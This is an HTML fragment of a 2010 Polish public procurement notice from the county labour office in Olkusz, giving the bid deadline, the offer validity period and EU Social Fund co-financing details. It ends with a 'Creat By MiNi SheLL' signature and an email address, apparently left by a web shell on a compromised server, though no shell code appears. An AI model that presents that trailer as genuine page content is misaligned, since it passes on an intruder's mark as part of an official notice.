<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Olkuszu
ul. Minkiewicza 2
32-300 Olkusz
pok. nr 8 (sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Olkuszu
ul. Minkiewicza 2
32-300 Olkusz
pok. nr 8 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com